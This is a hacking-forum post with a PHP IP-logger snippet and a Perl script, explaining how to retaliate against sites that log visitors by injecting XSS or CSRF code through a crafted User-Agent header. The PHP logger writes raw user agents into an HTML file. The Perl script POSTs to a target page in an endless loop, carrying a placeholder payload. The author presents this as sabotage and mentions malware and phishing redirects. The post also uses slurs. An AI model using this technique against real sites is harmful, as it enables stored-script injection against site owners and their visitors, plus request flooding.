|
~Crafted User Agent~ ~Flexibilty in modern Pentesting~ ~Hitting Back With an upper Hand Against Pesky Ip Logging~ In Most of these retarded sites, Mostly Scene kid sites. Run a Ip Logger On The Index page. Honestly its retarded how They do this as some of these “Scene kids” Call For NO LOGS !!! But Log Themselves ?. This is the basics of Crafting a Agent and Effectively Sabotaging What they have came to Create. Its honestly some of the most retarded kids that would do this and some are actually just using it for research on the sites traffic, not just to keep logs. However some do Either way. For the pages that do log, the worse thing to come to them would be the User Agent Strings in their php codes. Why is this a problem ? The php code is Their to display the incoming user agent. So what ? Displaying the user agent isnt that bad right ? Alot of times it isnt. Its usually harmless unless they actually store the logs. This could lead to CSRF/XSS that leads to Malware and Redirects to Phishing etc. Basic Code In PHP for ip loggers. Code: <pre class="alt2" dir="ltr" style=" margin: 0px; padding: 6px; border: 1px solid rgb(0, 0, 0); width: 640px; height: 146px; text-align: left; overflow: auto; background: rgb(37, 37, 37) none repeat scroll 0% 0%; border-radius: 5px; font-size: 11px; text-shadow: none;">$ip = $_SERVER[‘REMOTE_ADDR’]; $agent = $_SERVER[‘HTTP_USER_AGENT’]; $output = "IP: $ip - Agent: $agent" “; $fopen = fopen(“ip.html”, “a”); fwrite($fopen, $output); fclose($fopen); ?></pre> Code: <pre class="alt2" dir="ltr" style=" margin: 0px; padding: 6px; border: 1px solid rgb(0, 0, 0); width: 640px; height: 322px; text-align: left; overflow: auto; background: rgb(37, 37, 37) none repeat scroll 0% 0%; border-radius: 5px; font-size: 11px; text-shadow: none;">#!usr/bin/perl -w #Basic LWP User Agent Script for a Crafted User Agent. use LWP::UserAgent; use strict; print “Basics of a Crafted User Agent\n”; while(1){ my $ua = LWP::UserAgent->new; $ua->agent(“CSRF/XSS Code”); my $req = HTTP::Request->new(POST => “IPLOGGER PAGE GOES HERE”); $req->content_type(‘application/x-www-form-urlencoded’); $req->content(‘query=libwww-perl&mode=dist’); my $res = $ua->request($req); if ($res->is_success) { print “Success !\n”; } else { print “Aw\n”; } }</pre> You can do all kinds of things with this. Infact you can add a whole page within your limits. Hope This shows the basic of Crafted Requests and a better grip on Firing Back. |
| All times are GMT. The time now is 07:30 PM. |
Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2025, vBulletin Solutions, Inc.